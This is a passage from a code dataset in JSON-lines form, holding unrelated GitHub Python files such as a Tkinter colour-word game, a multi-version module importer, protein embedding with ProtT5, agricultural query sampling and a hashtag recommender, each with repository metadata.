loaded_model.predict(input_features)\n class_names = ['setosa', 'versicolor', 'virginica']\n\n print(f\"Predicted class: {class_names[predicted_class[0]]}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SajjadAli54/CODING-SAMURAI-INTERNSHIP-TASK","sub_path":"Task 01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3418907616","text":"class Turn:\n\t''' \n\t\tThe Turn class keeps track of whose turn it is, the direction play is going in,\n\t\t the rolls that remain, and the moves made the current turn.\n\t'''\n\trolls = []\n\tmovesMade = []\n\tturn = ''\n\tturnPrint = ''\n\tturnCount = 0\n\tdirection = ''\n\n\tdef __init__(self, starter, homeColor):\n\n\t\t# Set turn and dir variables \n\t\tself.turn = starter\n\t\tself.setTurnPrint()\n\t\tif homeColor == 'b':\n\t\t\tif starter == 'b':\n\t\t\t\tself.direction = 
'anti'\n\t\t\telse:\n\t\t\t\tself.direction = 'clock'\n\t\telse:\n\t\t\tif starter == 'b':\n\t\t\t\tself.direction = 'clock'\n\t\t\telse: \n\t\t\t\tself.direction = 'anti'\n\n\tdef setTurnPrint(self):\n\t\tif self.turn == 'b':\n\t\t\tself.turnPrint = 'Black'\n\t\telse:\n\t\t\tself.turnPrint = 'White'\n\t\treturn self.turnPrint\n\n\tdef getTurnPrint(self):\n\t\treturn self.turnPrint\n\n\tdef getTurn(self):\n\t\treturn self.turn\n\n\tdef setRolls(self, newRolls):\n\t\tself.movesMade = []\n\t\tself.rolls = newRolls\n\t\treturn\n\n\tdef appendRoll(self, roll):\n\t\tself.rolls.append(roll)\n\t\treturn\n\n\tdef removeRoll(self, roll):\n\t\tself.rolls.remove(roll)\n\t\treturn\n\n\tdef printRoll(self):\n\t\tmsg = ''\n\t\tfor roll in self.rolls:\n\t\t\tmsg += str(roll) + ' '\n\t\treturn msg\n\n\tdef getDirection(self):\n\t\treturn self.direction \n\n\tdef nextTurn(self):\n\t\tif self.turn == 'b':\n\t\t\tself.turn = 'w'\n\t\telse:\n\t\t\tself.turn = 'b'\n\n\t\tif self.direction == 'anti':\n\t\t\tself.direction = 'clock'\n\t\telse:\n\t\t\tself.direction = 'anti'\n\n\t\tself.setTurnPrint()\n\n\t\treturn self.turn","repo_name":"burnsnoss/GammonHub","sub_path":"class/Turn.py","file_name":"Turn.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30807255515","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport yaml\n\n\ndef main():\n std_input = \"\"\n while True:\n try:\n line = input()\n except EOFError:\n break\n std_input += line\n\n try:\n json_in = json.loads(std_input)\n print(yaml.dump(json_in))\n except json.JSONDecodeError as e:\n print(\"No valid json: {}\".format(e.msg))\n except Exception as e:\n print(\"Error: {}\".format(e.msg))\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"mocanug/yq","sub_path":"json2yaml.py","file_name":"json2yaml.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72930118521","text":"import re\nimport pandas as pd\nimport tempfile\nfrom pathlib import Path\n\n# model_params = {\"pipeline\": \"entity,quote,supersense,event,coref\", \"model\": \"big\"}\n# booknlp = BookNLP(\"en\", model_params)\n\nwith open(\"/Users/josca/projects/1729/news/data/nlp/stopwords.text\") as f:\n stopwords = f.read().split(\"\\n\")\n\n\ndef char_id2quotee(char_id, df_ents):\n names_possible = df_ents[\n (df_ents[\"COREF\"] == char_id)\n & (df_ents[\"text\"].str.lower().isin(stopwords) == False)\n ]\n if names_possible.empty:\n return \"unknown\"\n else:\n return names_possible[\"text\"].value_counts().index[0]\n\n\ndef add_quotee(df_quotes, df_ents):\n char_id2quotee_mapping = {}\n for char_id in df_quotes[\"char_id\"].unique():\n char_id2quotee_mapping[char_id] = char_id2quotee(char_id, df_ents)\n df_quotes[\"quotee\"] = df_quotes[\"char_id\"].map(char_id2quotee_mapping)\n return df_quotes\n\n\ndef get_article_quotes(dir_path):\n df_quotes = pd.read_csv(dir_path / \"book.quotes\", sep=\"\\t\")\n df_ents = pd.read_csv(dir_path / \"book.entities\", sep=\"\\t\")\n df_quotes = add_quotee(df_quotes, df_ents)\n return df_quotes\n\n\n# def extract_quotes(text):\n# with tempfile.TemporaryDirectory() as tmp_dir:\n# dir_path = Path(tmp_dir)\n\n# input_file = dir_path / \"input_file.txt\"\n# with input_file.open(\"a\") as f:\n# f.write(text)\n\n# booknlp.process(input_file, dir_path, \"book\")\n\n# df_quotes = get_article_quotes(dir_path)\n\n# return 
df_quotes\n","repo_name":"josca42/news","sub_path":"news/nlp/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20397934611","text":"import os\nimport sys\nimport imp\nimport importlib\n\n\"\"\"\nMulti version module import support\n\"\"\"\n\nNAMESPACE = \"vimport.namespace\"\n\nmulti_version_space = imp.new_module(NAMESPACE)\nmulti_version_space.__path__ = []\nmulti_version_space.__cache__ = {}\nmulti_version_space.__map__ = {}\n\nsys.modules[NAMESPACE] = multi_version_space\n\n\ndef __module_check(name, version):\n if type(name) is not str:\n raise RuntimeError('module name should be string')\n\n # we will test this later...\n if type(version) is not str:\n raise RuntimeError('version should be string only')\n\n\ndef __internal_version(version):\n return version.replace(\".\", \"_\")\n\n\ndef __version_module_name(name, version):\n return '%s-%s' % (name, version)\n\n\ndef __intern_module_name(name, version):\n return '%s.%s' % (NAMESPACE, __version_module_name(name, __internal_version(version)))\n\n\ndef __real_module_name(name, version):\n return '%s.%s' % (__intern_module_name(name, version), name)\n\n\ndef __is_module_loaded(name, version):\n v_module = __version_module_name(name, version)\n return v_module in sys.modules\n\n\ndef __load_module(name, version):\n v_dir = v_module = __version_module_name(name, version)\n for path in sys.path:\n full_path = os.path.join(path, v_dir)\n if os.path.isdir(full_path):\n intern_name = __intern_module_name(name, version)\n module = imp.new_module(intern_name)\n setattr(multi_version_space, v_module, module)\n module.__path__ = [full_path]\n module.__vname__ = v_module\n sys.modules[module.__name__] = module\n return True\n return False\n\n\ndef unload_all_module(name):\n _map = multi_version_space.__map__\n v_modules = _map.get(name)\n if v_modules:\n for vm, im in v_modules.items():\n multi_version_space.__cache__.pop(vm)\n sys.modules.pop(im)\n _map.pop(name)\n return True\n return False\n\n\ndef unload_module(name, version):\n __module_check(name, version)\n v_module = __version_module_name(name, version)\n i_module = __intern_module_name(name, version)\n _cache = multi_version_space.__cache__\n _map = multi_version_space.__map__\n if name in _map and v_module in _cache:\n _cache.pop(v_module)\n _map.get(name).pop(v_module)\n sys.modules.pop(i_module)\n return True\n return False\n\n\ndef import_module(name, version, force=False):\n __module_check(name, version)\n vmod_name = __version_module_name(name, version)\n imod_name = __intern_module_name(name, version)\n _cache = multi_version_space.__cache__\n _map = multi_version_space.__map__\n\n if force:\n unload_module(name, version)\n\n if vmod_name not in _cache:\n if not __is_module_loaded(name, version):\n if __load_module(name, version):\n real_name = __real_module_name(name, version)\n i_module = importlib.import_module(real_name)\n _cache[vmod_name] = i_module\n _map.setdefault(name, dict()).setdefault(vmod_name, imod_name)\n return _cache.get(vmod_name)\n\n\ndef reload_module(name, version):\n unload_module(name, version)\n return import_module(name, version)\n\n\ndef list_all_version_of_module(name):\n v_modules = multi_version_space.__map__.get(name)\n return list(v_modules.keys()) if v_modules else 
[]\n","repo_name":"xsank/vimport","sub_path":"vimport.py","file_name":"vimport.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"41483682680","text":"'''from time import sleep\nfor i in range(10, -1,-1):\n print(i)\n sleep(1)\nprint('BOMW')\nsleep(0.5)\nprint('CABUM')'''\ns = 0\nc = 0\nfor i in range(3,500,3):\n if i%2 == 1:\n s += i\n c += 1\nprint('A soma entre os {} numeros multiplos de 3 é igual a {}'.format(c,s))","repo_name":"Nathan120/Arq_Python_CursoEmVideo","sub_path":"Curso_Gustavo_Guanabara/Exercicio46.py","file_name":"Exercicio46.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25926175280","text":"from django.urls import path\nfrom . import views\n\napp_name = \"learning_path\"\n\nurlpatterns = [\n path(\"\", views.LearningPathView.as_view(), name=\"paths\"),\n path(\n \"/details/\",\n views.LearningPathDetailView.as_view(),\n name=\"path-detail\",\n ),\n]\n","repo_name":"cbsBiram/xarala__ssr","sub_path":"src/learning_path/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20014805974","text":"#!/usr/bin/python\n__author__ = 'yiqingj'\n\nimport os\nimport sys\n\n\ndef replicate():\n command = '../../bin/osmosis --replicate-apidb authFile=dbAuth.txt allowIncorrectSchemaVersion=true --write-replication workingDirectory=data'\n os.system(command)\n\n\nif __name__ == \"__main__\":\n replicate()","repo_name":"yiqingj/map-delta-update","sub_path":"script/replicate.py","file_name":"replicate.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40159037760","text":"import os\n\nfrom jinja2 import Template\nfrom eng.logging import error, success\n\n\ndef create_folder(folder_path):\n if os.path.isdir(folder_path):\n error(\"Directory {dirName} already exists.\".format(dirName=os.path.abspath(folder_path)))\n os.mkdir(folder_path)\n success(os.path.abspath(folder_path) + \"/\")\n\n\ndef write_file(file_path, content):\n if os.path.isdir(file_path):\n error(\"File {filePath} already exists.\").format(filePath=os.path.abspath(file_path))\n\n with open(file_path, \"a\") as outfile:\n outfile.write(content)\n success(os.path.abspath(file_path))\n\n\ndef read_template(template):\n template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"templates\")\n filename = template + \".template\"\n\n template_file = os.path.join(template_dir, filename)\n\n if not os.path.isfile(template_file):\n error(\"Unknown template file ({tmpl}).\".format(tmpl=filename))\n\n data = None\n with open(template_file, \"rU\") as infile:\n data = infile.read()\n return Template(data)\n\n\ndef render_app(app_name):\n template = read_template(\"app\")\n ccName = app_name.replace('_', ' ').title().replace(' ', '')\n return template.render(appCamelCase=ccName)\n\n\ndef render_view(view_name):\n template = read_template(\"view\")\n view_title = view_name.replace('_', ' ').title().replace(' ', '')\n view_camel = view_title + 'View'\n return template.render(viewCamelCase=view_camel, viewTitle=view_title)\n\n\ndef render_service(service_name):\n template = read_template(\"service\")\n svc_camel = service_name.replace('_', ' ').title().replace(' ', '') + 'Service'\n return 
template.render(serviceCamelCase=svc_camel)\n","repo_name":"dalloriam/engel","sub_path":"eng/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"71563995959","text":"# Dependency -> Install pillow module\n# pip install pillow\n\nfrom tkinter import *\nimport random\nimport os\nimport urllib.request as req\ntry :\n from PIL import Image, ImageTk\nexcept:\n os.system('pip3 install pillow')\n from PIL import Image, ImageTK\n\nlist = os.listdir()\nif 'color.png' not in list:\n req.urlretrieve('https://i1.wp.com/www.ed2go.com/blog/wp-content/uploads/2015/01/Color-Logo-Design-Tips.png', 'color.png')\n print('Image Downloaded.')\n\nclass color:\n def __init__(self,root):\n # Declaring Variables\n self.TIME = 60\n self.SPEED = 1000\n self.SCORE = 0\n self.RANDOM1 = random.randint(0,8)\n self.RANDOM2 = random.randint(0,8)\n self.COLOR_LOGO_PATH = 'color.png'\n self.COLOR_TEXT_FONT = ('Monotype Corsiva', -55, 'bold')\n self.ID = None\n self.START_FLAG = True\n\n # Creating Image object for logo\n self.COLOR_LOGO_IMAGE = ImageTk.PhotoImage(Image.open(self.COLOR_LOGO_PATH).resize((150,70)), Image.ANTIALIAS)\n # Declaring Colors and Their Names\n self.COLORS_ON_TEXT = ('red','green','pink','white','black','blue','yellow','orange','purple','brown')\n self.COLORS_NAME = ('red','green','pink','white','black','blue','yellow','orange','purple','brown')\n\n\n # Declaring frames \n self.frame = Frame(root, height=420, width=300)\n self.frame.propagate(0)\n self.frame.pack()\n \n # Declaring Widget\n self.logolabel = Label(self.frame, image = self.COLOR_LOGO_IMAGE)\n self.logolabel.pack(pady=10)\n self.gamelabel = Label(self.frame, text='GAME', font=('Bahnschrift Condensed', -40, 'bold'))\n self.gamelabel.pack()\n self.messagelabel = Label(self.frame, text='TYPE THE COLOR OF THE WORDS\\nNOT THE WORD TEXT', font=('Times New Roman', -15, 'bold'), foreground='skyblue')\n self.messagelabel.pack()\n self.scorelabel = Label(self.frame, text='SCORE: 0', font=('Times New Roman', -20, 'bold'))\n self.scorelabel.pack()\n self.timeleftlabel = Label(self.frame, text='TIME LEFT: 0', font=('Times New Roman', -15))\n self.timeleftlabel.pack()\n self.colorlabel = Label(self.frame, text='-----------', font=self.COLOR_TEXT_FONT)\n self.colorlabel.pack()\n self.textlabel = Label(self.frame, text='ENTER COLOR BELOW :', font=('Times New Roman', -15))\n self.textlabel.pack()\n self.entry = Entry(self.frame)\n self.entry.pack()\n self.startbutton = Button(self.frame, text='Start', font=('Times New Roman', -20), width=10)\n self.startbutton.pack(pady=10)\n self.entry.bind('', self.check)\n\n self.startbutton.bind('', self.startx)\n\n def startx(self, event):\n if self.START_FLAG :\n self.entry.focus_set()\n self.colorlabel.config(text=self.COLORS_NAME[self.RANDOM1], foreground=self.COLORS_ON_TEXT[self.RANDOM2])\n self.START_FLAG = not self.START_FLAG\n self.timeleftlabel.config(text=f'TIME LEFT: {self.TIME}')\n if self.TIME == 0:\n messagebox.showinfo('Game Over',f'Your Score : {self.SCORE}')\n self.SCORE = 0\n self.TIME = 60\n self.timeleftlabel.after_cancel(self.ID)\n self.START_FLAG = True\n else:\n self.TIME=self.TIME-1\n self.ID = self.timeleftlabel.after(1000, lambda: self.startx(event))\n \n def check(self, event):\n COMPARE = self.COLORS_ON_TEXT[self.RANDOM2]\n self.RANDOM1 = random.randint(0,9)\n self.RANDOM2 = random.randint(0,9)\n if self.TIME > 0 and self.entry.get() != '':\n 
self.colorlabel.config(text=self.COLORS_NAME[self.RANDOM1], foreground=self.COLORS_ON_TEXT[self.RANDOM2])\n if COMPARE == self.entry.get():\n self.SCORE += 1\n else:\n self.SCORE -= 1\n self.entry.delete(0,END)\n self.scorelabel.config(text=f'SCORE: {self.SCORE}')\n \n\nroot = Tk()\nroot.title('CoLoR')\nobj = color(root)\nroot.mainloop()","repo_name":"intizar-khilji/solos","sub_path":"color_1.2.py","file_name":"color_1.2.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12799499675","text":"import os\nimport time\nimport numpy as np\n\n\ndef evaluate(config, wrapper_model, data_loader, device, lg, mode):\n # Initialize metrics\n num_examples = 0\n cl_loss, cl_correct = 0, 0\n adv_loss, adv_correct = 0, 0\n\n # Accumulate loss/accuracy over batches\n for _, (x, y) in enumerate(data_loader):\n x, y = x.to(device), y.to(device)\n\n # Get model output\n wrapper_model.eval()\n output = wrapper_model(x, y)\n\n cl_logits, adv_logits = output[0], output[1]\n cl_loss_batch, adv_loss_batch = output[2], output[3]\n\n # Aggregate clean loss/accuracy\n num_examples += x.shape[0]\n cl_loss += cl_loss_batch.item()\n _, cl_logits_dig = cl_logits.max(1)\n cl_correct += cl_logits_dig.eq(y).float().sum().item()\n\n # Aggregate adversarial loss/accuracy\n adv_loss += adv_loss_batch.item()\n _, adv_logits_dig = adv_logits.max(1)\n adv_correct += adv_logits_dig.eq(y).float().sum().item()\n\n if num_examples >= config['test']['num_sample']:\n break\n\n # Compute average loss/accuracy\n cl_loss, cl_acc = cl_loss/num_examples, cl_correct/num_examples\n adv_loss, adv_acc = adv_loss/num_examples, adv_correct/num_examples\n\n # Print and log loss/accuracy metrics\n lg.print(f'Clean {mode} loss: {cl_loss:.4f}, accuracy: {cl_acc * 100:.2f}')\n lg.print(f'Advers {mode} loss: {adv_loss:.4f}, accuracy: {adv_acc * 100:.2f}')\n return adv_acc\n","repo_name":"wagner-group/dual-domain-at","sub_path":"utils/mdl.py","file_name":"mdl.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"25139616588","text":"# special thanks to the Goby team for this!\nimport aiohttp\nfrom chia.rpc.full_node_rpc_client import FullNodeRpcClient\nimport time\n\nclass LeafletFullNodeRpcClient(FullNodeRpcClient):\n def __init__(self, leaflet_url):\n self.leaflet_url = leaflet_url\n super().__init__()\n self.session = aiohttp.ClientSession()\n self.closing_task = None\n\n\n async def fetch(self, path, request_json):\n async with self.session.post(self.leaflet_url + path, json=request_json) as response:\n response.raise_for_status()\n\n res_json = await response.json()\n if not res_json[\"success\"]:\n raise ValueError(res_json)\n return res_json\n\n","repo_name":"Yakuhito/tibet","sub_path":"leaflet_client.py","file_name":"leaflet_client.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"11860307847","text":"### 프로그래머스 Level1\n### 제일 작은 수 제거하기 (연습문제)\n### https://programmers.co.kr/learn/courses/30/lessons/12935?language=python3\n\n\ndef solution(arr):\n arr.remove(min(arr))\n return arr if len(arr) else [-1]\n\n\nif __name__ == \"__main__\":\n answer1 = solution([4,3,2,1])\n answer2 = solution([10])\n\n print(f\"{answer1} : {answer1 == [4,3,2]}\")\n print(f\"{answer2} : {answer2 == 
[-1]}\")\n","repo_name":"shhommychon/CodingSkillTest-old","sub_path":"Python/YSDA02_semester1/00_just_for_practice/023_prgkr_removeminnum.py","file_name":"023_prgkr_removeminnum.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73492511801","text":"import numpy as np\r\nimport math\r\n\r\n# Bigram frequencies \r\nM = np.zeros((27,27))\r\nwith open(\"AustenCount.txt\") as f:\r\n lines = f.readlines()\r\n for i, l in enumerate(lines):\r\n row = l.split()\r\n for j, val in enumerate(row):\r\n M[i,j] = int(val)\r\n\r\nlogM = np.log(M.astype(int) + 1)\r\n\r\n# text to decode\r\ntext = \"\"\r\nwith open(\"f_9.txt\") as f:\r\n text = f.readline()\r\n\r\n# coversions from text to numbers\r\nalphabet = list(\"abcdefghikjlmnopqrstuvwxyz \")\r\nasciiVals = {i: val for i, val in enumerate(alphabet)}\r\nasciiValsReverse = {val: i for i, val in enumerate(alphabet)}\r\n\r\n# calculates score given text\r\ndef score(currentVals):\r\n arr = np.array(list(currentVals))\r\n arr = np.vectorize(asciiValsReverse.__getitem__)(arr)\r\n arr_unshift = arr[:len(arr) - 1]\r\n arr_shift = arr[1:] # shape ex (50), get to (50, 2)\r\n\r\n arr_unshift = np.expand_dims(arr_unshift, axis=1)\r\n arr_shift = np.expand_dims(arr_shift, axis=1)\r\n arr_combined = np.append(arr_unshift, arr_shift, axis=1)\r\n\r\n arr_more = np.apply_along_axis(lambda a: logM[a[0], a[1]], 1, arr_combined)\r\n\r\n return np.sum(arr_more)\r\n\r\n# given a matrix for swaps, this will return the potentially decoded text\r\ndef getAnswer(text, chooser):\r\n newtext = \"\"\r\n for t in text:\r\n newtext = newtext + asciiVals[chooser[asciiValsReverse[t]]]\r\n \r\n return newtext\r\n\r\n\r\n# chooser with no swaps\r\nchooser = np.arange(27)\r\n\r\n# score before starting\r\npreScore = score(getAnswer(text, chooser))\r\n\r\nfor i in range(1,50001):\r\n chosen = np.random.choice(np.arange(27), 2, replace=False)\r\n preChooser = chooser.copy()\r\n\r\n chooser[chosen[0]] = preChooser[chosen[1]]\r\n chooser[chosen[1]] = preChooser[chosen[0]]\r\n\r\n calcScore = score(getAnswer(text, chooser))\r\n uni = np.random.uniform(size=1)[0]\r\n\r\n # if score is below 0 it can be ignored, and if it is above 100 it will go through\r\n scoreDif = 0\r\n if (calcScore - preScore > 0):\r\n if (calcScore - preScore > 100):\r\n scoreDif = 100\r\n else:\r\n print(calcScore - preScore)\r\n scoreDif = math.exp(calcScore - preScore)\r\n\r\n if uni < scoreDif:\r\n preScore = calcScore\r\n else:\r\n chooser = preChooser.copy()\r\n \r\n if i % 1000 == 0:\r\n print(\"~~~\")\r\n print(getAnswer(text, chooser))\r\n print(\"~~~\")\r\n","repo_name":"kazar4/APMA-1941D-Project","sub_path":"project1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24783522302","text":"import torch\nfrom transformers import T5EncoderModel, T5Tokenizer, AutoModel, pipeline\nimport re\nimport numpy as np\nimport json\nfrom pathlib import Path\nimport os\nimport requests\nfrom tqdm.auto import tqdm\nimport gc\n\n\nif __name__ == '__main__':\n model_name = 'prot_t5_xl_uniref50'\n data_split = 'valid'\n tokenizer = T5Tokenizer.from_pretrained(f\"Rostlab/{model_name}\", do_lower_case=False)\n model = T5EncoderModel.from_pretrained(f\"Rostlab/{model_name}\")\n gc.collect()\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model = model.to(device)\n model = 
model.eval()\n\n with open(f'./data/fsmol/prot_map_{data_split}.json', 'r') as f:\n prot_map = json.load(f)\n\n prots, assays = [], []\n for key, val in prot_map.items():\n prots.append(val)\n assays.append(key)\n\n seqs = [[c for c in prot] for prot in prots]\n spaced_seqs = [' '.join(seq) for seq in seqs]\n filtered_seqs = [re.sub(r\"[UZOB]\", \"X\", sequence) for sequence in spaced_seqs]\n idx = 0\n batch_size = 1\n all_embeds = []\n while idx < len(filtered_seqs):\n end = min(idx + batch_size, len(filtered_seqs))\n batch = filtered_seqs[idx: end]\n idx = end\n ids = tokenizer.batch_encode_plus(batch, add_special_tokens=True, padding=True)\n input_ids = torch.tensor(ids['input_ids']).to(device)\n attention_mask = torch.tensor(ids['attention_mask']).to(device)\n with torch.no_grad():\n embedding = model(input_ids=input_ids, attention_mask=attention_mask)\n embedding = embedding.last_hidden_state.cpu().numpy()\n features = []\n\n # Remove padding (\\) and special tokens (\\) that is added by ProtT5-XL-UniRef50 model\n for seq_num in range(len(embedding)):\n seq_len = (attention_mask[seq_num] == 1).sum()\n seq_emd = embedding[seq_num][:seq_len - 1]\n features.append(seq_emd)\n\n protein_features = [np.mean(tokens, axis=0) for tokens in features]\n all_embeds.extend(protein_features)\n to_save = {}\n for assay_id, embed in zip(assays, all_embeds):\n to_save[assay_id] = embed\n np.savez_compressed(f'./non_averaged_prot_embeds_fsmol_{data_split}', **to_save)\n","repo_name":"nkami/cfom","sub_path":"embed_prot.py","file_name":"embed_prot.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8694013763","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm import tqdm\n\n\n# In[2]:\n\n\ndf = pd.read_csv('Data.csv')\n\ndf2 = df[pd.notna(df['Sector'])]\ndf2 = df2[pd.notna(df2['Query Type'])]\n\ndf = df2\ndf = df.reset_index(drop=True)\n\n\n# In[3]:\n\n\n# Plant Protection + Nutrient Management + Disease Management\n# Weather + Sowing Time and Weather\n# Government Schemes\n# Cultural Practices\n# Fertilizer Use and Availability\n# Agriculture Mechanization\n# Seeds and Planting Material + Seeds\n# Weed Management\n# Credit\n# Fishery Nutrition\n\n# Final Query_Type dictionary\nDict = {}\nDict['Nutrient Management'] = 'Plant Protection'\nDict['Plant Protection'] = 'Plant Protection'\nDict['Disease Management'] = 'Plant Protection'\nDict['Sowing Time and Weather'] = 'Weather'\nDict['Government Schemes'] = 'Government Schemes'\nDict['Cultural Practices'] = 'Cultural Practices'\nDict['Fertilizer Use and Availability'] = 'Fertilizer Use and Availability'\nDict['Cultural Practices'] = 'Cultural Practices'\nDict['Agriculture Mechanization'] = 'Agriculture Mechanization'\nDict['Seeds and Planting Material'] = 'Seeds'\nDict['Seeds'] = 'Seeds'\nDict['Weed Management'] = 'Weed Management'\nDict['Credit']='Credit'\nDict['Fishery Nutrition']='Fishery Nutrition'\n\n\n# In[4]:\n\n\nsampled_df = df[df['Query Type']=='Fishery Nutrition']\nfor qt in Dict.keys():\n if qt == 'Fishery Nutrition':\n continue\n df1 = df[df['Query Type']==qt]\n# print(qt, len(df1))\n df1 = df1.sample(frac=1)\n sampled_df = sampled_df.append(df1[:1000])\n \nsampled_df = sampled_df.reset_index(drop=True)\n \nfor i in range(len(sampled_df)):\n sampled_df['Query Type'][i] = Dict[sampled_df['Query Type'][i]]\n 
\nsampled_df.to_csv('final_sampled_data.csv',index=False)\n\n\n# In[5]:\n\n\nsampled_df = df[df['Sector']=='FISHERIES']\nfor qt in set(df['Sector']):\n if qt == 'FISHERIES':\n continue\n df1 = df[df['Sector']==qt]\n# print(qt, len(df1))\n df1 = df1.sample(frac=1)\n sampled_df = sampled_df.append(df1[:2500])\nsampled_df.to_csv('sector_sampled_data.csv',index=False)\n\n","repo_name":"neilrs123/Kisan-Query-Analysis","sub_path":"src/Classification/1_Data_Analysis_and_Data_Cleaning.py","file_name":"1_Data_Analysis_and_Data_Cleaning.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17813786107","text":"import numpy as np\r\nimport pandas as pd\r\nimport Preproce\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport json\r\nimport pdb\r\nfrom tqdm import tqdm\r\n\r\ntrainSet = './data/trainSet.txt'\r\ntestSet = './data/testSet.txt'\r\ncontentEmb = './data/embeddings.json'\r\ntagEmb = './data/tagEmb.txt'\r\nuserEmb = './data/userEmb.txt'\r\ntrain_df = pd.read_table(trainSet)\r\ntest_df = pd.read_table(testSet)\r\ntrain_df['hashtag'] = train_df['content'].apply(Preproce.get_hashtag)\r\ncontent_user_df = train_df.groupby(['user_id'], as_index=False).agg({'content': lambda x: list(x)})\r\ncontent_tag_df = train_df.explode('hashtag').groupby(['hashtag'], as_index=False).agg({'content': lambda x: list(x)})\r\nuser_tag_df = train_df.explode('hashtag').groupby(['user_id'], as_index=False).agg({'hashtag': lambda x: list(x)})\r\nuser_list = list(set(train_df['user_id'].tolist())) # [0:2000]\r\nTag_df = train_df.explode('hashtag')\r\nTag_list = list(set(Tag_df['hashtag'].tolist()))[1:]\r\n# Tag_list.remove('nan')\r\n# 读取content_emb文件给con_emb_dict赋值user_tag_lis\r\n\r\n##############################################################################\r\npopular_tag_df = pd.read_table('./data/countTag.txt')\r\npopular_tag_lis = []\r\nfor i in range(500):\r\n popular_tag_lis.append(popular_tag_df['hashtag'].loc[i])\r\n##############################################################################\r\n\r\nwith open(\"data/embeddings.json\", \"r\") as f:\r\n con_emb_dict = json.load(f)\r\n\r\n\r\ndef cal_upper_bound(user_lis):\r\n user_test_df = test_df\r\n user_test_df['hashtag'] = user_test_df['content'].apply(Preproce.get_hashtag)\r\n\r\n print(user_test_df['hashtag'])\r\n'''\r\n success = 0\r\n for user in user_lis: # 重复出现的user要记得筛掉\r\n # print('score of tag rec for: '+user)\r\n spec_tag_lis = popular_tag_lis\r\n # spec_tag_lis = user_tag_df['hashtag'].loc[user_tag_df['user_id'] == user].tolist()[0]\r\n print(spec_tag_lis)\r\n each = 0\r\n test_tag_lis = user_test_df['hashtag'].loc[user_test_df['user_id'] == user].tolist()\r\n print(test_tag_lis)\r\n for tag in spec_tag_lis:\r\n if tag in test_tag_lis:\r\n success += 1\r\n each += 1\r\n break\r\n print(each)\r\n\r\n print(\"history upper bound: \" + str(success / len(user_list)))\r\n'''\r\n\r\n\r\n# basic layer\r\ndef content_embedding(content):\r\n try:\r\n return con_emb_dict[content]\r\n except:\r\n return [0] * 768\r\n\r\n\r\n# second layer\r\ndef average_user_tweet(user_lis):\r\n user_arr_dict = {}\r\n for user in user_lis:\r\n embed_list = []\r\n content_list = content_user_df['content'].loc[content_user_df['user_id'] == user].tolist()[0]\r\n for content in content_list:\r\n embed_list.append(content_embedding(content))\r\n embed_list = np.mean(np.array(embed_list), axis=0) # (768, )\r\n user_arr_dict[user] = embed_list\r\n\r\n return 
user_arr_dict\r\n\r\n\r\n# second layer\r\ndef average_hashtag_tweet(tag_lis):\r\n tag_arr_dict = {}\r\n for tag in tag_lis:\r\n embed_list = []\r\n try:\r\n content_list = content_tag_df['content'].loc[content_tag_df['hashtag'] == tag].tolist()[0]\r\n except:\r\n pdb.set_trace()\r\n for content in content_list:\r\n embed_list.append(content_embedding(content))\r\n embed_list = np.mean(np.array(embed_list), axis=0) # (768, )\r\n tag_arr_dict[tag] = embed_list\r\n\r\n return tag_arr_dict\r\n\r\n\r\ndef cosine_similar(user, hashtag, user_arr_dict, tag_arr_dict):\r\n return float(cosine_similarity(user_arr_dict[user].reshape(1, -1), tag_arr_dict[hashtag].reshape(1, -1)))###############################\r\n\r\n\r\ndef rank_hashtag():\r\n # dictionary to return hashtag recommendation score to all user\r\n spe_user_cos_list = []\r\n\r\n user_arr_dict = average_user_tweet(user_list)\r\n tag_arr_dict = average_hashtag_tweet(Tag_list)\r\n\r\n for user in 